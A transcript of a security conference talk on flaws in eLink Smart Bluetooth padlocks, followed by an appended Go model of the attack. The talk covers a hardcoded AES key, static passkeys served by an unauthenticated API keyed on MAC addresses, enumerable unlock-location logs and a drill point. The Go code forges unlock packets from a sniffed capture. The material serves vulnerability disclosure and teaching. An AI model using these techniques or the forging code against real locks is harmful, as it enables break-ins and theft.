"Open, Sesame!" Unlocking Bluetooth Padlocks With Kind Requests - Miłosz Gaczkowski & Alex Pettifer

BSides London, 38:38, published 2024-02
Category: Technical
Style: Talk

Transcript [en]

Okay, hello everybody, hope you're having a fantastic BSides so far. Without too much further ado, let's get into our talk, where we will be talking about unlocking Bluetooth padlocks with what is essentially a polite request, as you will soon see. A little bit in terms of introductions, as soon as my PowerPoint begins to work... there we go. So that was all the production value of the presentation, by the way; don't expect more of that. About myself: my name is Miłosz. In my past life I did a fair bit of computer science and cyber security teaching. Nowadays I am the mobile security lead at WithSecure, where I mostly look at the security of Android and iOS apps and Android devices.

I'm just going to continue going... maybe try this very quickly... oh, did that... no luck. Nope, no luck. Let's try quickly out and in. Thinking about it... okay, we're into troubleshooting territory. Oh, we got something, we've got something. Quick, tab back in. So then if I tab into... oh, it's on the wrong screen. Give me two seconds. From current slide, yes, okay. We can keep going.

Without further ado: my name is Miłosz, past life university teaching, blah blah blah blah blah, currently mobile security lead at WithSecure. I enjoy obscure power metal and the colour purple. If you want to talk to me you'll probably find me on Twitter. Moving on to Alex.

Hi, I'm Alex. I used to be a student; I am thankfully not anymore. I love locks and I like rats, and this is my first ever BSides as attendee or speaker. [Applause] Woo!

So Alex is also one of our interns at WithSecure from this year, and the talk that we'll be doing today is mostly about a project that we've done together. So why are we here? Kind of less in a philosophical sense and more why are you actually in this room right now. The reason we're here today is, yeah, as I mentioned, to talk about something that started as an intern project. It is a bit of a cross-section of physical and mobile application security, which is kind of the combination of our interests. In terms of original goals, it started off being a project whose goal was to learn a little bit more about Bluetooth Low
Energy, how you actually connect to the bloody thing, what does it do, but also to build a little bit of experience in mobile application reverse engineering, interacting with them, and kind of how to grok a mobile app that you've just downloaded from the internet. Long story short, we've got some interesting findings; we'll be showing those to you today and hopefully entertaining you with those. And yeah, our goals for today will be to probably have a little bit of banter to entertain you, go over the technical understanding and the fun findings, and finally talk about the process, so you could potentially do similar things in the near future. Our key questions are to figure out whether a malicious device could listen in and replicate the signal that actually unlocks a smart padlock. Let's just do this again
quickly. He's thinking about it, thinking about it. I think we're about to be back, something's happening. Yeah, it's very much thinking about it. No, it is blank. Try again. Going well? Come on, it's not liking it. Try another port, that'll work. Okay, bear with me, I'm going to knock the resolution down to like 720p. Oh, we had it for a second. Yeah, oh, it's in his back. Oh, do I keep going? I'm going to keep going for now; if it doesn't work then I'll... the resolution, yeah. Bring back the slideshow. Me to do the pun again: our key questions are to find out whether a malicious user or device could listen in on and replicate the unlock signal of a lock, whether they could potentially tamper with the lock in any other way, so can they communicate with the lock and tell it to do something that it isn't supposed to do, and, crucially, how much information an attacker might need to perform this attack. Yeah, let's go 720p. Okay, shut up. Oh, that was before I did it as well, very exciting. Oh, it does look like 720p. It's okay, we'll keep going, we'll figure it out. Oh, it's got worse. It has got worse. Is that 4:3? Yeah, because it's now told me that its default resolution is 1024x768. It is really not liking what's currently going on here. Windows, always. It's not a Windows issue, I can assure you of that; this would have been 100 times worse if this was Linux. Okay, this one it doesn't like at all. Right, now I believe in you. It's okay, we can do this, we can do this, we can do this. Yay! Woo! No, you know, that's exactly... well, I don't know what this is, this isn't even any screen. No, that is my screen, it's just also thinking about it very hard, but the status bar's messed up. Yeah, it is. God.
But okay, we've got a little bit cut off, but absolutely much more stable on a much lower resolution. I'll skip this slide, you've heard it already. Mhm. So the locks themselves: they are from a Chinese company known as eLink Smart. They are known under a bunch of other brands as well, so we've seen them under Anwell, we've seen them under EC Smart, and a bunch of other random variations of those and names that don't really mean anything. The rationale for the specific choice of these locks was that they are very prominent on Amazon. If you go on Amazon UK and start looking for Bluetooth smart padlocks specifically, they kind of dominate the results, especially on early pages, and that kind of suggests a marketing budget; you don't get on top pages on Amazon organically, it is a very heavily marketised business of optimising those appearances. They've done a lot of advertising on German television as well, so they're clearly trying something there, and they are seemingly popular in Poland as well and in a few other marketplaces; if we went onto other auction sites you would also find that. Yeah, basically they seem to be quite popular. Functionality-wise, some of them are keyed, and the key functionality itself is fine, but it isn't immediately shocking. All of them have local fingerprint authentication, so I'll show the locks in a moment: they all have a little pad that you can touch with your finger and then they either unlock or not unlock depending on whether they like what your finger looks like. And finally, most of them have a remote functionality where they unlock over Bluetooth Low Energy, so you have a mobile application, you open that up and you go 'hey, I would like for this lock to unlock', it does some magic in the background (at this stage we don't know what it is) and then eventually the lock decides to pop open. So here's what they actually look like. The red and blue ones, so those two over there, don't actually have Bluetooth functionality; they are fingerprint unlock only, so we won't be showcasing those here today. But the other three that you can see in the picture, so the black ones and the circular one, all do have it. The one in the middle also has an actual keyway, and it's probably the least worst of the locks out here. Now on the back of these locks, or on little pieces of paper attached to them, there is a little bit of precaution written that I find very entertaining. It says 'please register first, experience mode, anyone can unlock'. Now I know what they're actually trying to say; what they're trying to say is that if you haven't first paired the lock with a phone, or if you haven't set up fingerprints, then they will just unlock when you touch them. But I find the phrasing quite amusing, especially given what we'll be doing in a moment. So let's talk about our actual tooling, approach and process. I'll start with a high-level methodology, then I'll hand over to Alex, who actually knows what the hell happened, because yeah, I would be probably wasting you... 'You're just a supervisor, you didn't even do anything.' Yeah, isn't it great being supervisor. So in terms of methodology, the kind of goals that we wanted to achieve: first things first was to actually intercept and understand the Bluetooth Low Energy communications, so the idea was hook it up with Wireshark
and a sniffer and kind of just get visibility of the traffic. We then also wanted to decompile and reverse engineer the application; that was done with kind of classic mobile security tools, Frida, JADX GUI, Android Debug Bridge. And finally intercept HTTPS communications, which is probably the least interesting part of this talk, but at the same time it is where things may have happened. Handing over to Alex, who understands the technical side of things. Hello, hello. So first of all, quickly, we're on Bluetooth Low Energy. It has a lot of nuances, a lot of features, but the most important parts really are that it is short-range communication over radio, with inputs and outputs designated by MAC addresses. You are able to view devices in the local area by their MAC address and then connect to them; otherwise it's just data in and data out, and that's all that's really necessary. So to start things off we reverse engineered the Bluetooth Low Energy side of things. To do that we used this little widget, a Nordic Semiconductor nRF52840 dongle loaded up with their own Bluetooth sniffing software. This gets loaded straight into Wireshark and from there we can monitor it. On the right here is a Wireshark screenshot showing the packet; however, in more detail, here are the packets again. This was the initial data that we saw. Pretty... I mean, there are some patterns. First of all, each packet starts with this consistent value, what was found to be the length of the total rest of the packet, split between multiple messages, and all of the messages themselves were very random looking. Because they were so random and because they were always an exact multiple of 16 bytes long, this led to the assumption or conclusion that AES was being used, specifically a block cipher, which encrypts things bit by bit in chunks of 16 bytes. So from here we knew we needed to decrypt the
communications if we wanted to further reverse engineer it, and for that we would have to look inside the application itself. 'I love how it's getting cut off, that's really fantastic.' So to reverse engineer the application we loaded it up into JADX, which is a decompilation tool. From there we noticed everything was very heavily obfuscated; all of the functions and variables were single-name variables, so we needed some kind of clue to start piecing things together. Thankfully, within the application there was a custom logging library which included a very consistent format of class name, method name and some message, often including a variable name, and these little log messages were littered all throughout the code. So an example here is this obfuscated, ugly c.n.a.f dog, completely comprehensible; however, there is this line towards the bottom: 'BLE protocol utils, send package, unlock cloud PWD', probably password. So using that, and using other log messages through our other functions, we were able to start deobfuscating things. So all of these previously unnamed variables were given nice friendly names for us, including an encryptData function. Looking into here, we could see how things worked: basically take a message, encrypt it, always encrypt it using the same hardcoded key. Fantastic. So because it's hardcoded, that means we can read all messages basically forever, because it's hardcoded on the application side and on the hardware side. So a quick sidetrack on encryption: specifically, this is using symmetric key encryption, which means both sides are the same, so we can decrypt packets to and from. Yeah, so after decrypting a packet, this is what we found. This was sort of the consistent format of them: they always started with the total length of the rest of the packet, followed by a little command code which would tell the lock what function to perform, whether it be unlock, add a new fingerprint, whatever; a login token, which is negotiated when it first connects to the lock; and in this case,
because this is the unlock cloud password packet, it also includes an ASCII-encoded password. The password here was always six digits of decimal. And so I'll take it back to Miłosz to explain what that was. Yeah, so at this point we have a bit of an understanding of how the communication actually occurs. So you've got your login tokens; they appear to be random, and we think that they were most likely used to prevent replay attacks, the idea being that if you used one of those sniffers to listen in on an unlock command, if you tried to send the exact same unlock command back it wouldn't work, because it wouldn't be exactly correct, it would be missing that one piece of randomness. That information, however, could be easily obtained, so what you would do is you would basically communicate with the lock, say 'hey, give me your token for right this moment', and then you could construct that packet. But yeah, you couldn't just straight up repeat it. Then you provide a six-digit passkey and the lock pops open; that tends to be the kind of workflow on that side of things. So at this point we do actually kind of have enough information to perform a replay attack, even though they tried to protect against it, because what we can do is we can observe the unlock command once, we can decrypt it because we found the encryption material, we can go back to the appearance of the actual packet and grab that last bit, which is the passkey, and then reconstruct our request with the new unlock token; we can always create valid unlock tokens. So at this point we have a kind of, sort of, replay attack where we have to do a little bit of work, but not very much, provided that we know the passkey. So how do we find out the passkey? That's kind of the one thing that we're missing right now. We can find it out by listening to the locks, but that means that we need to be right there, and as you'll see when I try to run the demo, I will actually have to grab this laptop and put it down, because you have to be really bloody close. So it's viable, but it's not viable. How do we find a passkey? It seems to never change: we've factory reset these locks, we've linked them up with multiple mobile devices, it keeps being the same. So if it was 123456 it will forever be 123456. However, the phone and the application somehow know what that code is for each lock, so how does it get it? At the time we only had one lock, so
one potential hypothesis was: oh, is it hardcoded? Hopefully not, but we've already seen some interesting stuff, so maybe. Could it be generated from the lock details somehow? That seems quite likely, but we weren't able to identify a pattern, so we're going with 'as far as we know, no, maybe they are'. Or does it come from the web? And that last option seems very likely, because the initial setup process requires you to be online. If this was some form of derivation, considering how lazy they have been with the application otherwise, that would have happened on the client side; there would be no need for client-server communication. So, flying with the hypothesis that it actually does come from the web, from the API, we start looking at web traffic, and sure enough, after a little bit of looking through Burp Suite (so essentially it's very similar to what you would do with any web application security stuff; anybody who's played with Burp Suite before, you've pretty much seen it all; the only thing that is slightly different here is there's a few steps to set up your phone to pipe through Burp Suite, but that is a relatively easy, quite quick setup, and I'm not going to bore you with that part because that's a Google search really), looking through the actual information, we eventually find a passkey request. So there was a POST request to the API saying 'get lock info by MAC', and it took a few parameters. It took the MAC address of the lock, which is a public piece of information: every time the lock advertises that it's available to be connected to, it broadcasts its MAC address, so that is information you definitely, super duper know. There is the username of the user who is actually performing the unlock, some sort of session token (that's already pretty good), and then a couple of parameters that honestly we don't understand and don't care about; we don't know what type=2 means, and cp=el I think has something to do with branding, but again, going to kind of dismiss those as unimportant. The response to that looks like this. We very helpfully get informed twice that the request was successful, once by state and once by a message in Mandarin Chinese. It then reminds us of the MAC address and tells us what the actual passcode to unlock the lock is, in this case 49625. So now we understand the full operation of the actual mobile application. So there is a little bit of API communication going on: first the mobile application goes to the API and says 'hey, can I please have the unlock code for this specific lock, here is all my information'; that comes back with a number; we take it; we then talk to the actual lock and we go 'hey, can I have your temporary token', which I need to construct the packet (if that requires no authorisation or anything, that is intentional); it just comes back and says 'hey, here's my random number'; you then construct the request (you've seen the packet before, you just plop that data in), the lock processes all that, and if it's happy it will pop open. Right, so you know this request. Yeah, I've told you that it requires a MAC address, a username, a login token, blah blah blah blah blah. What of this information does it actually require? Hopefully we can test that through the magic of just replacing things with random gibberish. You'll be pleased to know that that responded just fine, so it came back and said 'hello, here's my passcode'. Okay, cool. So does it matter if those are even present? No, no it doesn't. And just a quick reminder, this is public information, so the MAC address... again, I realise this is kind of cut off, but I think you can infer most of it, so basically it's mac= that, right. That is public information that you can get from the lock itself, which means now we can put something together. Mhm. And I'll hand over to Alex, who put something together. So taking this all together and building a single proof of concept, what
we do is we scan for nearby BLE devices, filter out the ones with the eLink OUI or whatever it is, grab the passkey from the API completely for free (we don't need to do any work there at all), connect to the lock itself, grab the token, send the password and ta-da, it opens. And now we are going to very bravely attempt a demo. So as I mentioned, I'm going to have to take this laptop and put it down. You know how we've had some interesting visual issues before? Yeah, fingers crossed. So I'm going to try this. We're okay for now. Step two, thank you, thank you. Step two is to bring in my other screen onto there, which is another chance for it to all explode. We'll see, we'll see. No, we're on, perfect. So I'm going to do a couple of things here. I'm going to start by switching these on, so I will just touch each lock once. I am accidentally using the right fingerprint, so I'm going to stop doing that. So I've touched at least two of them with the wrong fingerprint, I promise you, and the other two didn't realise that I did it. Anyway, they're all locked, and now all I'm going to do is I am going to run this script, and what that will do is hopefully detect these. I need to be very close, so it should detect four of them in a moment. Yep, we've got four, and then for each of them it's going to go talk to the API, grab the admin passcode, and in a moment... yeah, we've had one of them unlock, this one, whoop, and this one's gone, and I've heard one, I think it was this one, yep, and the black one... it's something, needs to think about it... no, there we go. Right, now do I present from the ground or do I try this again? I'm going to try this again. I think we're okay. Okay, that was the most technical part of this talk. Right, now, we're not amateurs, we had a backup demo in case this all went to hell. I'm going to skip the video; it's exactly what you've seen right now, it just is slightly more pre-recorded and pre-prepared, so click through that. So on top of the endpoint that gives you the password completely for free, they had some other ones. One of them was a basic 'list locks owned by a user', where it takes a user ID as an
argument, which of course was a sequential number going up and very easily enumerated. From there, from grabbing that full list of locks, you could use the 'get unlock log' endpoint, which returns the full log of any lock, given all of the times it's been unlocked. Now, incredibly, it includes a feature that records the location when it was unlocked. This means that for any lock, again easily enumerable by user ID, you could grab the latitude and longitude, go out there and find it and unlock it. So that's back to me. Back to you. I'll expand on that just a little bit. There were many API endpoints on there; we tried not to put too many of them in the slides because we would be here all day, but another fun thing that this application did... So there's a little bit of a saving grace with the location stuff, in that by default it's disabled, so by default it will not record the locations of unlocks. You can just turn it on, though, for any lock. Yeah, so you know how nothing here requires authentication or authorisation? Yeah, that doesn't require it either. So if you were absolutely insane you could probably go through, enable it for a whole bunch of them, and then monitor them until you start seeing unlock locations, and then, assuming that they're actually within reasonable distance to you, you've literally just got a beacon on a map of where you want to go to unlock a random padlock and grab whatever is behind it. I don't think anybody would actually do it, but it is very possible, it's very easy. Have we seen locks within reasonable distance of us? I couldn't possibly comment. No, that would be irresponsible, we would never do anything like that. So let's summarise the issues. Obviously there are the API vulnerabilities, and they are kind of the principal problem here; everything else is not okay, but this is the least okay. The absolutely obvious one is the lack of authentication and authorisation. You can get some fairly sensitive
information out of it, you have the ability to change people's settings, you pretty much just get to control their system as if you were the owner of it. There were some other problems, they were very, very basic, and I will not go into them today, but suffice to say if you're thinking of some, you probably got it right. We will then move on to the kind of middle-level issue of hardcoded encryption material. So even if the API was all sorted out, there is still the potential of extracting a passcode from one of these unlock situations. Because the encryption material never changes, it's symmetric, it is hardcoded in the application, it is essentially ineffective; it is more an obfuscation method with extra steps, because all this requires you to do is open up the app, look at it for a while (how long that while is depends on your luck, but you will find it), you will decrypt it; it basically does nothing. And finally, and this is probably the least worst of the issues here, is the static passkeys. They are endlessly reusable. You've seen the passkeys when I was running the demo, we haven't hidden them from you, you now know how to unlock these four locks. I promise you we won't be putting them on anything sensitive, but you do, and you now know every single step of that; without hitting the API you could very easily unlock them. So that's not ideal. Ideally they would either change periodically or the user would be able to change them, something along those lines, because currently if through some means you get these, the user has no recourse; they can't change their passkey, their lock just becomes unlockable by somebody else. So what can we actually do in terms of mitigations? Each of these locks has a fingerprint-only mode. It's very difficult to get into; I've only managed to get into it by accident, then I've read the manual, then I read the manual again, and eventually I got a gist for it. So it's something like: unpair them from the phone, then long press, then press five times with the same finger, and then it switches to fingerprint-only mode. You would lose some functionality, because at that point they stop responding to the Bluetooth requests, but that's kind of what we want. So you end up with a lock that is still quite low security (I mean look, those are flimsy, they can be smashed open with a hammer, they can be pulled open through every single technique you can imagine), but for a low-security, overpriced lock at least you've got something, as opposed to something that just pops open on request. An option that I think I prefer, at least for these ones, because they
actually have keyways on them: I would probably take them apart and gut them and just get rid of the smart functionality. You will end up with a 50 quid crappy lock, but you at least have a lock that actually works; that's better than just throwing it out. Otherwise, put them in the bin. Anything else would require cooperation from the manufacturer, whom we've obviously tried to contact. I'll give you a moment to ponder how do you think that went; give me like a thumbs up, thumbs down. Okay, okay, okay, am I seeing any thumbs up? I don't think I'm seeing any. Oh, I got one from Dan, perfect, very ironic thumbs up. Now here's how it actually went. So we started trying to communicate with them on the 1st of September. We wrote up an excessively long email explaining all the issues and how they can be exploited and how they could be fixed. Very unsurprisingly, that got us a big fat load of nothing; no response at all. We followed up a couple more times, tried to explain it a little bit more, but we were just getting completely blanked. We tried asking for a security contact, obviously completely blanked. We've tried emailing multiple points of contact within the company that seemed right; they claimed to have like a data protection enforcer, obviously that was getting no responses at all. Didn't we even email their social media outreach manager? We did email their social media outreach manager, in the hope that they would at least be reading their emails. No, nothing. Nope. Then suddenly, on around the 24th of October, something happened. My battery is running low, I'm not getting charged here, excellent. Well, we'll just speedrun this. So yeah, we got no response from the vendor, but the API and app suddenly received an update and things started changing a little bit, and we were thinking, ooh, maybe they are listening, because what happened essentially is, in these requests that I've showed you, they weren't expecting any authentication or authorisation; there was a brief moment in time when they were taking authentication but no authorisation. So what that means is you have to log in, it's just that you could log in as anybody and still get full access. So it wasn't really doing anything, but it was trying to do something; it seemed like there is some amount of effort going in there. So our thought was, oh, maybe they actually are reading our emails and just not responding to them; maybe they think that we're looking for money, or maybe there's some cultural barrier, we don't know. We are communicating with a company that is entirely based in China; there might be something we don't understand as to why they don't get back to us. But that was optimistic. We've adjusted our PoC a little bit to make sure it actually logs in, and then at some point when we were retesting everything we realised that they've undone it all a month later, so we're back to no authentication, no authorisation. There was like two weeks during which they were doing it. Current working hypothesis is that it probably broke something in the app and they were just, nah, just undo it, it's fine. Casually disabled authentication. Yeah, you know, it wasn't worth running, it's too much effort. Yeah, no, realistically we don't know what happened there; it was just interesting that it did. And it
does give me some hope that maybe there is someone out there reading those emails and just, yeah, for whatever reason doesn't respond. So we will continue to try and communicate with them, but at the same time they have had forever and a day to try and do something about this and they haven't, so we're going public. Blog post: this says it's been released, it absolutely hasn't; that'll be coming out in like, you know, maybe a week or two. It is basically written, it just needs a few tweaks; I think that's the standard excuse that everybody gives. But we're doing this talk and we will keep trying to communicate with the vendor, and I'd like to use this as a slight opportunity: if you or anybody you know speaks Mandarin to a level where they could communicate these issues and perhaps help us bridge the cultural barrier, that is something we would very much like to try, because we're thinking maybe that's it, maybe the problem is that there are, you know, long emails coming from a weird guy in English; maybe if they were in Chinese, in a more approachable way, I don't know. But yeah, if you do, please, please get in touch. Which finally brings me to our conclusions, if my PowerPoint continues to work. There we go. Conclusion number one: don't buy this crap. Don't do what we did unless it's for fun. If you're going to buy them to play with them, if you're going to buy them to try and replicate this or to understand how these things work, then yes, by all means, but bloody hell, don't put them on anything sensitive. Thing is, like, with this vendor, maybe they will fix things eventually; again, we are slightly hopeful. My laptop was about to die. Give it a quick try, you never know. What were the rest of the conclusions? No, I can keep talking about the conclusions. So yeah, it's: don't buy this crap. The other one is there is a little bit of hope that maybe eventually that specific vendor will fix them, but then there's a question of what about other vendors; you know, is that going to be any better? Probably not is my guess. Two seconds. So yeah, you know, there are other smart padlock vendors, there are plenty of other talks that try and go over the same type of issues, and they basically had very similar findings; a lot of the time it is a completely unauthenticated API or very, very basic implementation flaws in the locks themselves. We're not optimistic that if you went for a different brand you would be doing any better; even the big-name ones like Master Lock or ABUS, typically they probably are just using another cheap Chinese brand and then just slapping their own sticker on top of it. Yeah, so I would say more expensive brands, I mean maybe they're better, we haven't checked them, but I wouldn't hold my breath. Realistically, I don't think that these things will get better without standards or regulations. Currently nobody tests these things; there are no requirements for any standards or for any assurance around the security of these products. So yeah, why would you buy them? Especially since it is not in anybody's interest, in the kind of trifecta of people who make them and sell them, to ensure that... this stuff sells fine just as it is, why make it
secure, unless people stop buying it. And finally, and this is kind of my bigger message here: you now actually have the tools to look into similar issues. We've talked about them at a high level; if you need more technical detail about any of the sides of this, please feel free to give us a shout, we will be more than happy to talk about it in more detail, either today at the conference or if you just pop us a message, that's completely fine. Or read the blog, that's definitely up. Yeah, which will be up in a couple of weeks, and then we'll delay it again. But in general I would say more scrutiny on this kind of stuff is always good. Again, these are shockingly bad; it would be good if people were actually playing with them, because then again there is a little bit of benefit from them. The skill set is really not too hard to develop, but it is quite rare; people for some reason don't really go into reversing of these kinds of processes or into reversing of mobile applications. Everybody kind of tends to focus on the big areas of offensive security and they leave poor mobile back in the dirt. I'm trying to encourage you here to actually give it a try, and yeah, go and hack some locks and other IoT devices. Go break stuff, it's fun. So does anybody have any questions? Go ahead. [Music] I did try picking them. Okay, I have very limited experience with slider locks in particular. I might try and find someone who's running the lock picking village and force them to try picking it and tell me. I couldn't pick it; I don't have much experience with that type of lock. But I don't know, I think another thing that's worth mentioning on that question is, for how crappy they are and for how weak they are, they have actually put in a decent effort into preventing at least the most obvious physical bypasses. So at least the bigger ones, the purple and black one that you've seen before, you can't shim them; there's no core bypass where you stick something down the core and actuate the mechanism yourself, that doesn't exist in these, they've actually protected against it. Yeah, ball bearing locking mechanism, which prevents shimming. Physically speaking, in terms of like brute force security, they are not great, but they're also not terrible; for the big ones at least it's a 7 mm unhardened steel shackle, which probably won't stand up against most bolt cutters, but it might be a deterrent. The body itself is... I actually don't know what it's made out of, but it's quite a thin casing; it is metal, but it's quite a thin casing and could probably be drilled or cut through quite easily, especially if it's gutted. So in general I would never recommend these as actual physically secure locks under any circumstances, especially not for the price, but if you've got one, it's better than throwing it away. I think the other thing, in terms of drilling specifically, is there's a point roughly around here: if you drill through, you'll get exactly to the point where the motor actuates the motorised unlock mechanism, and then you can literally just poke it with a stick and it'll open. So if you're going destructive that's probably the easiest way to do it, especially if you know where that point is, and I think I could probably eyeball it by now. However, if they're in their kind of full Bluetooth functionality, why would you go destructive? You can just ask it to open as well. Yeah. Cool, anybody else? I will say I think that's all the time we have. Apologies for the late start and technical issues. Yeah, give a big hand to Miłosz and Alex.
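The exchange the talk describes, modelled end to end as an added example in Go: the BLE payload is AES under a key fixed in the app, the decrypted packet is a length prefix, a command code, a per-connection login token and a six-digit ASCII passkey, and the attack is "sniff one unlock, decrypt it with the fixed key, keep the passkey, re-encrypt it with a token the lock has just handed out". This is not code from the talk or from the speakers' proof of concept. The key bytes, the command code, the token length, AES-ECB as the mode and zero padding are all assumptions standing in for details the talk does not give; the passkey and tokens are constructed.

```go
package main

import (
	"crypto/aes"
	"crypto/rand"
	"errors"
	"regexp"
)

var (
	hardcodedKey = []byte("example-key-0123")       // constructed stand-in for the key hardcoded in the app
	aesBlock, _  = aes.NewCipher(hardcodedKey)      // cannot fail for a 16-byte key
	sixDigits    = regexp.MustCompile(`^[0-9]{6}$`) // the talk: "always six digits of decimal"
)

const (
	cmdUnlockCloudPwd byte = 0x21 // hypothetical command code for "unlock with cloud password"
	tokenLen               = 4    // assumed size of the per-connection login token
)

// Packet is the decrypted layout the talk describes, [len][cmd][token][ASCII passkey],
// zero-padded to a whole number of AES blocks (padding scheme assumed).
type Packet struct {
	Cmd     byte
	Token   []byte
	Passkey string
}

// ecb applies one raw AES block operation per 16-byte block (ECB is an assumption;
// the talk only establishes "AES, always a multiple of 16 bytes").
func ecb(in []byte, op func(dst, src []byte)) ([]byte, error) {
	if len(in) == 0 || len(in)%aes.BlockSize != 0 {
		return nil, errors.New("not a whole number of AES blocks")
	}
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += aes.BlockSize {
		op(out[i:], in[i:])
	}
	return out, nil
}

// Encode serialises and encrypts a packet the way the app does.
func (p Packet) Encode() ([]byte, error) {
	if len(p.Token) != tokenLen || !sixDigits.MatchString(p.Passkey) {
		return nil, errors.New("token must be 4 bytes and passkey six decimal digits")
	}
	body := append([]byte{p.Cmd}, p.Token...)
	body = append(body, p.Passkey...)
	plain := append([]byte{byte(len(body))}, body...)
	if rem := len(plain) % aes.BlockSize; rem != 0 {
		plain = append(plain, make([]byte, aes.BlockSize-rem)...)
	}
	return ecb(plain, aesBlock.Encrypt)
}

// Decode is what anyone holding the hardcoded key can do to a sniffed packet.
func Decode(ct []byte) (Packet, error) {
	plain, err := ecb(ct, aesBlock.Decrypt)
	if err != nil {
		return Packet{}, err
	}
	n := int(plain[0])
	if n < 1+tokenLen || 1+n > len(plain) {
		return Packet{}, errors.New("bad length prefix")
	}
	body := plain[1 : 1+n]
	p := Packet{Cmd: body[0], Token: body[1 : 1+tokenLen], Passkey: string(body[1+tokenLen:])}
	if !sixDigits.MatchString(p.Passkey) {
		return Packet{}, errors.New("passkey is not six ASCII digits")
	}
	return p, nil
}

// IssueToken models the lock's "here's my random number": fresh per connection, no auth needed.
func IssueToken() []byte {
	t := make([]byte, tokenLen)
	if _, err := rand.Read(t); err != nil {
		panic(err)
	}
	return t
}

// LockAccepts models the lock's check: unlock command, the token it last issued, its static passkey.
func LockAccepts(ct, issued []byte, passkey string) (bool, error) {
	p, err := Decode(ct)
	if err != nil {
		return false, err
	}
	return p.Cmd == cmdUnlockCloudPwd && string(p.Token) == string(issued) && p.Passkey == passkey, nil
}

// ForgeUnlock is the attacker's move: decrypt one sniffed unlock, keep its passkey,
// re-encrypt it with a token the lock has just issued.
func ForgeUnlock(sniffed, freshToken []byte) ([]byte, error) {
	p, err := Decode(sniffed)
	if err != nil {
		return nil, err
	}
	p.Token = freshToken
	return p.Encode()
}
```

A byte-for-byte replay fails once the lock has issued a new token, which is the anti-replay property the talk credits the token with; ForgeUnlock shows why it does not help when the key is fixed, since the only secret left in the packet is the static passkey, and that is recovered from a single capture (or, as the talk goes on to show, from the unauthenticated API without any capture at all).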